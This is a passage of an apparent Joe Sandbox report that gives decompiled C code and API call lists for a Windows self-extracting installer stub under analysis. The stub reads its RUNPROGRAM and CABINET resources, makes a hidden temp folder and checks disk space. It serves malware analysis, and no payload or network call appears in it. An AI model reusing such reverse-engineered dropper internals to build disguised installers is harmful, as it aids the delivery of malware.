                                                                        				_t2 = E00F3468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                        				if(_t109 != 0) {
                                                                        					_t82 = "RUNPROGRAM";
                                                                        					_t32 = E00F3468F(_t82, _t109, 1);
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                        						__eflags = _t33;
                                                                        						if(_t33 == 0) {
                                                                        							 *0xf39a30 = 1;
                                                                        						}
                                                                        						LocalFree(_t109);
                                                                        						_t35 =  *0xf38b3e; // 0x0
                                                                        						__eflags = _t35;
                                                                        						if(_t35 == 0) {
                                                                        							__eflags =  *0xf38a24; // 0x0
                                                                        							if(__eflags != 0) {
                                                                        								L46:
                                                                        								_t101 = 0x7d2;
                                                                        								_t36 = E00F36517(_t82, 0x7d2, 0, E00F33210, 0, 0);
                                                                        								asm("sbb eax, eax");
                                                                        								_t38 =  ~( ~_t36);
                                                                        							} else {
                                                                        								__eflags =  *0xf39a30; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									_t109 = 0xf391e4;
                                                                        									_t40 = GetTempPathA(0x104, 0xf391e4);
                                                                        									__eflags = _t40;
                                                                        									if(_t40 == 0) {
                                                                        										L19:
                                                                        										_push(_t82);
                                                                        										E00F31781( &_v268, 0x104, _t82, "A:\\");
                                                                        										__eflags = _v268 - 0x5a;
                                                                        										if(_v268 <= 0x5a) {
                                                                        											do {
                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                        												__eflags = _t109 - 6;
                                                                        												if(_t109 == 6) {
                                                                        													L22:
                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                        													__eflags = _t48 - 0xffffffff;
                                                                        													if(_t48 != 0xffffffff) {
                                                                        														goto L30;
                                                                        													} else {
                                                                        														goto L23;
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _t109 - 3;
                                                                        													if(_t109 != 3) {
                                                                        														L23:
                                                                        														__eflags = _t109 - 2;
                                                                        														if(_t109 != 2) {
                                                                        															L28:
                                                                        															_t66 = _v268;
                                                                        															goto L29;
                                                                        														} else {
                                                                        															_t66 = _v268;
                                                                        															__eflags = _t66 - 0x41;
                                                                        															if(_t66 == 0x41) {
                                                                        																L29:
                                                                        																_t60 = _t66 + 1;
                                                                        																_v268 = _t60;
                                                                        																goto L42;
                                                                        															} else {
                                                                        																__eflags = _t66 - 0x42;
                                                                        																if(_t66 == 0x42) {
                                                                        																	goto L29;
                                                                        																} else {
                                                                        																	_t68 = E00F36952( &_v268);
                                                                        																	__eflags = _t68;
                                                                        																	if(_t68 == 0) {
                                                                        																		goto L28;
                                                                        																	} else {
                                                                        																		__eflags = _t68 - 0x19000;
                                                                        																		if(_t68 >= 0x19000) {
                                                                        																			L30:
                                                                        																			_push(0);
                                                                        																			_t103 = 3;
                                                                        																			_t49 = E00F3597D( &_v268, _t103, 1);
                                                                        																			__eflags = _t49;
                                                                        																			if(_t49 != 0) {
                                                                        																				L33:
                                                                        																				_t50 = E00F32630(0,  &_v268, 1);
                                                                        																				__eflags = _t50;
                                                                        																				if(_t50 != 0) {
                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                        																				}
                                                                        																				_t88 =  &_v268;
                                                                        																				E00F3658A(_t88, 0x104, "msdownld.tmp");
                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                        																				if(_t53 != 0xffffffff) {
                                                                        																					_t54 = _t53 & 0x00000010;
                                                                        																					__eflags = _t54;
                                                                        																				} else {
                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                        																				}
                                                                        																				__eflags = _t54;
                                                                        																				if(_t54 != 0) {
                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                        																					_push(_t88);
                                                                        																					_t109 = 0xf391e4;
                                                                        																					E00F31781(0xf391e4, 0x104, _t88,  &_v268);
                                                                        																					_t101 = 1;
                                                                        																					_t59 = E00F35467(0xf391e4, 1, 0);
                                                                        																					__eflags = _t59;
                                                                        																					if(_t59 != 0) {
                                                                        																						goto L45;
                                                                        																					} else {
                                                                        																						_t60 = _v268;
                                                                        																						goto L42;
                                                                        																					}
                                                                        																				} else {
                                                                        																					_t60 = _v268 + 1;
                                                                        																					_v265 = 0;
                                                                        																					_v268 = _t60;
                                                                        																					goto L42;
                                                                        																				}
                                                                        																			} else {
                                                                        																				_t65 = E00F32630(0,  &_v268, 1);
                                                                        																				__eflags = _t65;
                                                                        																				if(_t65 != 0) {
                                                                        																					goto L28;
                                                                        																				} else {
                                                                        																					_t67 = E00F3597D( &_v268, 1, 1, 0);
                                                                        																					__eflags = _t67;
                                                                        																					if(_t67 == 0) {
                                                                        																						goto L28;
                                                                        																					} else {
                                                                        																						goto L33;
                                                                        																					}
                                                                        																				}
                                                                        																			}
                                                                        																		} else {
                                                                        																			goto L28;
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														goto L22;
                                                                        													}
                                                                        												}
                                                                        												goto L47;
                                                                        												L42:
                                                                        												__eflags = _t60 - 0x5a;
                                                                        											} while (_t60 <= 0x5a);
                                                                        										}
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t101 = 1;
                                                                        										_t69 = E00F35467(0xf391e4, 1, 3); // executed
                                                                        										__eflags = _t69;
                                                                        										if(_t69 != 0) {
                                                                        											goto L45;
                                                                        										} else {
                                                                        											_t82 = 0xf391e4;
                                                                        											_t70 = E00F32630(0, 0xf391e4, 1);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												goto L19;
                                                                        											} else {
                                                                        												_t101 = 1;
                                                                        												_t82 = 0xf391e4;
                                                                        												_t71 = E00F35467(0xf391e4, 1, 1);
                                                                        												__eflags = _t71;
                                                                        												if(_t71 != 0) {
                                                                        													goto L45;
                                                                        												} else {
                                                                        													do {
                                                                        														goto L19;
                                                                        														L43:
                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                        														_push(4);
                                                                        														_t101 = 3;
                                                                        														_t82 =  &_v268;
                                                                        														_t44 = E00F3597D(_t82, _t101, 1);
                                                                        														__eflags = _t44;
                                                                        													} while (_t44 != 0);
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t35 - 0x5c;
                                                                        							if(_t35 != 0x5c) {
                                                                        								L10:
                                                                        								_t72 = 1;
                                                                        							} else {
                                                                        								__eflags =  *0xf38b3f - _t35; // 0x0
                                                                        								_t72 = 0;
                                                                        								if(__eflags != 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        							}
                                                                        							_t101 = 0;
                                                                        							_t73 = E00F35467(0xf38b3e, 0, _t72);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								L45:
                                                                        								_t38 = 1;
                                                                        							} else {
                                                                        								_t101 = 0x4be;
                                                                        								E00F344B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t101 = 0x4b1;
                                                                        						E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						LocalFree(_t109);
                                                                        						 *0xf39124 = 0x80070714;
                                                                        						goto L2;
                                                                        					}
                                                                        				} else {
                                                                        					_t101 = 0x4b5;
                                                                        					E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					 *0xf39124 = E00F36285();
                                                                        					L2:
                                                                        					_t38 = 0;
                                                                        				}
                                                                        				L47:
                                                                        				return E00F36CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                        			}






































                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00F355CF
                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00F35638
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F3564C
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F35620
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F356B9
                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00F3571E
                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00F35737
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00F357CD
                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00F357EF
                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00F35802
                                                                          • Part of subcall function 00F32630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00F32654
                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00F35830
                                                                          • Part of subcall function 00F36517: FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F3652A
                                                                          • Part of subcall function 00F36517: LoadResource.KERNEL32(00F30000,00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F36538
                                                                          • Part of subcall function 00F36517: DialogBoxIndirectParamA.USER32(00F30000,00000000,00000547,00F319E0,00000000), ref: 00F36557
                                                                          • Part of subcall function 00F36517: FreeResource.KERNEL32(00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F36560
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00F35878
                                                                          • Part of subcall function 00F3597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F359A8
                                                                          • Part of subcall function 00F3597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00F359AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                        • API String ID: 2436801531-3110009808
                                                                        • Opcode ID: 0ddaf08c6e905e49657cb5b4d4c349e675e38b8bf9a57584587a90674aa2f20a
                                                                        • Instruction ID: b02e7d50269223b6d6508f368edd06474ef59bfbbe414993ff6cff99cdf6e955
                                                                        • Opcode Fuzzy Hash: 0ddaf08c6e905e49657cb5b4d4c349e675e38b8bf9a57584587a90674aa2f20a
                                                                        • Instruction Fuzzy Hash: CD811DB1E04A089ADB24AB358C85BFE765E9FE0B70F040065F9C6D2191DFB8CDC1BA51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        [Figure: control-flow graph of function f3597d (blocks f3597d to f35c14), nodes marked Executed / Not Executed]
                                                                        C-Code - Quality: 96%
                                                                        			E00F3597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				char _v788;
                                                                        				long _v792;
                                                                        				long _v796;
                                                                        				long _v800;
                                                                        				signed int _v804;
                                                                        				long _v808;
                                                                        				int _v812;
                                                                        				long _v816;
                                                                        				long _v820;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				signed int _t46;
                                                                        				int _t50;
                                                                        				signed int _t55;
                                                                        				void* _t66;
                                                                        				int _t69;
                                                                        				signed int _t73;
                                                                        				signed short _t78;
                                                                        				signed int _t87;
                                                                        				signed int _t101;
                                                                        				int _t102;
                                                                        				unsigned int _t103;
                                                                        				unsigned int _t105;
                                                                        				signed int _t111;
                                                                        				long _t112;
                                                                        				signed int _t116;
                                                                        				CHAR* _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        
                                                                        				_t114 = __edi;
                                                                        				_t46 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t46 ^ _t120;
                                                                        				_v804 = __edx;
                                                                        				_t118 = __ecx;
                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                        				if(_t50 != 0) {
                                                                        					_push(__edi);
                                                                        					_v796 = 0;
                                                                        					_v792 = 0;
                                                                        					_v800 = 0;
                                                                        					_v808 = 0;
                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                        					__eflags = _t55;
                                                                        					if(_t55 == 0) {
                                                                        						L29:
                                                                        						memset( &_v788, 0, 0x200);
                                                                        						 *0xf39124 = E00F36285();
                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        						_t110 = 0x4b0;
                                                                        						L30:
                                                                        						__eflags = 0;
                                                                        						E00F344B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                        						SetCurrentDirectoryA( &_v276);
                                                                        						L31:
                                                                        						_t66 = 0;
                                                                        						__eflags = 0;
                                                                        						L32:
                                                                        						_pop(_t114);
                                                                        						goto L33;
                                                                        					}
                                                                        					_t69 = _v792 * _v796;
                                                                        					_v812 = _t69;
                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                        					__eflags = _t116;
                                                                        					if(_t116 == 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                        					__eflags = _t73;
                                                                        					if(_t73 != 0) {
                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                        						_t101 =  &_v16;
                                                                        						_t111 = 6;
                                                                        						_t119 = _t118 - _t101;
                                                                        						__eflags = _t119;
                                                                        						while(1) {
                                                                        							_t22 = _t111 - 4; // 0x2
                                                                        							__eflags = _t22;
                                                                        							if(_t22 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                        							__eflags = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *_t101 = _t87;
                                                                        							_t101 = _t101 + 1;
                                                                        							_t111 = _t111 - 1;
                                                                        							__eflags = _t111;
                                                                        							if(_t111 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t111;
                                                                        						if(_t111 == 0) {
                                                                        							_t101 = _t101 - 1;
                                                                        							__eflags = _t101;
                                                                        						}
                                                                        						 *_t101 = 0;
                                                                        						_t112 = 0x200;
                                                                        						_t102 = _v812;
                                                                        						_t78 = 0;
                                                                        						_t118 = 8;
                                                                        						while(1) {
                                                                        							__eflags = _t102 - _t112;
                                                                        							if(_t102 == _t112) {
                                                                        								break;
                                                                        							}
                                                                        							_t112 = _t112 + _t112;
                                                                        							_t78 = _t78 + 1;
                                                                        							__eflags = _t78 - _t118;
                                                                        							if(_t78 < _t118) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t78 - _t118;
                                                                        						if(_t78 != _t118) {
                                                                        							__eflags =  *0xf39a34 & 0x00000008;
                                                                        							if(( *0xf39a34 & 0x00000008) == 0) {
                                                                        								L20:
                                                                        								_t103 =  *0xf39a38; // 0x0
                                                                        								_t110 =  *((intOrPtr*)(0xf389e0 + (_t78 & 0x0000ffff) * 4));
                                                                        								L21:
                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                        									__eflags = _v804 & 0x00000001;
                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                        										__eflags = _t103 - _t116;
                                                                        									} else {
                                                                        										__eflags = _t110 - _t116;
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                        								}
                                                                        								if(__eflags <= 0) {
                                                                        									 *0xf39124 = 0;
                                                                        									_t66 = 1;
                                                                        								} else {
                                                                        									_t66 = E00F3268B(_a4, _t110, _t103,  &_v16);
                                                                        								}
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _v816 & 0x00008000;
                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t105 =  *0xf39a38; // 0x0
                                                                        							_t110 =  *((intOrPtr*)(0xf389e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xf389e0 + (_t78 & 0x0000ffff) * 4));
                                                                        							_t103 = (_t105 >> 2) +  *0xf39a38;
                                                                        							goto L21;
                                                                        						}
                                                                        						_t110 = 0x4c5;
                                                                        						E00F344B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                        						goto L31;
                                                                        					}
                                                                        					memset( &_v788, 0, 0x200);
                                                                        					 *0xf39124 = E00F36285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        					_t110 = 0x4f9;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t110 = 0x4bc;
                                                                        					E00F344B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                        					 *0xf39124 = E00F36285();
                                                                        					_t66 = 0;
                                                                        					L33:
                                                                        					return E00F36CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F359A8
                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00F359AF
                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00F35A13
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00F35A40
                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F35A64
                                                                        • memset.MSVCRT ref: 00F35A7C
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F35A98
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F35AA5
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00F35BFC
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                        • String ID:
                                                                        • API String ID: 4237285672-0
                                                                        • Opcode ID: ff6960a8a25486e6dfc58c1b0eecd0c2e421b3e5c06162678890c7b453c93b10
                                                                        • Instruction ID: a917690c52adb9a8ff3ae3ff16b1931c4f5d6122b1b08d02629a6b384c8c456b
                                                                        • Opcode Fuzzy Hash: ff6960a8a25486e6dfc58c1b0eecd0c2e421b3e5c06162678890c7b453c93b10
                                                                        • Instruction Fuzzy Hash: CF71A1B190021CAFEB25DB60CC85FFBB7ADEB88764F0441A9F445D6240DA749E85AF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 374 f34fe0-f3501a call f3468f FindResourceA LoadResource LockResource 377 f35161-f35163 374->377 378 f35020-f35027 374->378 379 f35057-f3505e call f34efd 378->379 380 f35029-f35051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 f35060-f35077 call f344b9 379->383 384 f3507c-f350b4 379->384 380->379 388 f35107-f3510e 383->388 389 f350b6-f350da 384->389 390 f350e8-f35104 call f344b9 384->390 391 f35110-f35117 FreeResource 388->391 392 f3511d-f3511f 388->392 401 f35106 389->401 402 f350dc 389->402 390->401 391->392 394 f35121-f35127 392->394 395 f3513a-f35141 392->395 394->395 398 f35129-f35135 call f344b9 394->398 399 f35143-f3514a 395->399 400 f3515f 395->400 398->395 399->400 404 f3514c-f35159 SendMessageA 399->404 400->377 401->388 405 f350e3-f350e6 402->405 404->400 405->390 405->401
                                                                        C-Code - Quality: 77%
                                                                        			E00F34FE0(void* __edi, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t10;
                                                                        				void* _t12;
                                                                        				struct HWND__* _t24;
                                                                        				struct HWND__* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t33;
                                                                        				int _t34;
                                                                        				CHAR* _t36;
                                                                        				int _t37;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t36 = "CABINET";
                                                                        				 *0xf39144 = E00F3468F(_t36, 0, 0);
                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                        				 *0xf39140 = _t8;
                                                                        				if(_t8 == 0) {
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 =  *0xf38584; // 0x0
                                                                        				if(_t9 != 0) {
                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                        					ShowWindow(GetDlgItem( *0xf38584, 0x841), 5); // executed
                                                                        				}
                                                                        				_t10 = E00F34EFD(0, 0); // executed
                                                                        				if(_t10 != 0) {
                                                                        					__imp__#20(E00F34CA0, E00F34CC0, E00F34980, E00F34A50, E00F34AD0, E00F34B60, E00F34BC0, 1, 0xf39148, _t33);
                                                                        					_t34 = _t10;
                                                                        					if(_t34 == 0) {
                                                                        						L8:
                                                                        						_t29 =  *0xf39148; // 0x0
                                                                        						_t24 =  *0xf38584; // 0x0
                                                                        						E00F344B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                        						_t37 = 0;
                                                                        						L9:
                                                                        						goto L10;
                                                                        					}
                                                                        					__imp__#22(_t34, "*MEMCAB", 0xf31140, 0, E00F34CD0, 0, 0xf39140); // executed
                                                                        					_t37 = _t10;
                                                                        					if(_t37 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					__imp__#23(_t34); // executed
                                                                        					if(_t10 != 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					_t27 =  *0xf38584; // 0x0
                                                                        					E00F344B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                        					_t37 = 0;
                                                                        					L10:
                                                                        					_t12 =  *0xf39140; // 0x0
                                                                        					if(_t12 != 0) {
                                                                        						FreeResource(_t12);
                                                                        						 *0xf39140 = 0;
                                                                        					}
                                                                        					if(_t37 == 0) {
                                                                        						_t47 =  *0xf391d8; // 0x0
                                                                        						if(_t47 == 0) {
                                                                        							E00F344B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                        						}
                                                                        					}
                                                                        					if(( *0xf38a38 & 0x00000001) == 0 && ( *0xf39a34 & 0x00000001) == 0) {
                                                                        						SendMessageA( *0xf38584, 0xfa1, _t37, 0);
                                                                        					}
                                                                        					return _t37;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00F34FFE
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00F35006
                                                                        • LockResource.KERNEL32(00000000), ref: 00F3500D
                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00F35030
                                                                        • ShowWindow.USER32(00000000), ref: 00F35037
                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00F3504A
                                                                        • ShowWindow.USER32(00000000), ref: 00F35051
                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00F35111
                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00F35159
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                        • String ID: *MEMCAB$CABINET
                                                                        • API String ID: 1305606123-2642027498
                                                                        • Opcode ID: 2c99b5735833c1949fe1692f5b6331ce9b042078422ce63298a6df6ccdc37a08
                                                                        • Instruction ID: 663da06252f018073ef754636364ac6e542085de5f38a7ed94d222ece9f254d9
                                                                        • Opcode Fuzzy Hash: 2c99b5735833c1949fe1692f5b6331ce9b042078422ce63298a6df6ccdc37a08
                                                                        • Instruction Fuzzy Hash: 7331E9B0B4470A7BD7207B62AD89F67366EB744BB5F040024FD41A21A1DBF9EC00BA61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 95%
                                                                        			E00F353A1(CHAR* __ecx, CHAR* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t5;
                                                                        				long _t13;
                                                                        				int _t14;
                                                                        				CHAR* _t20;
                                                                        				int _t29;
                                                                        				int _t30;
                                                                        				CHAR* _t32;
                                                                        				signed int _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t5 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t5 ^ _t33;
                                                                        				_t32 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_t29 = 0;
                                                                        				while(1) {
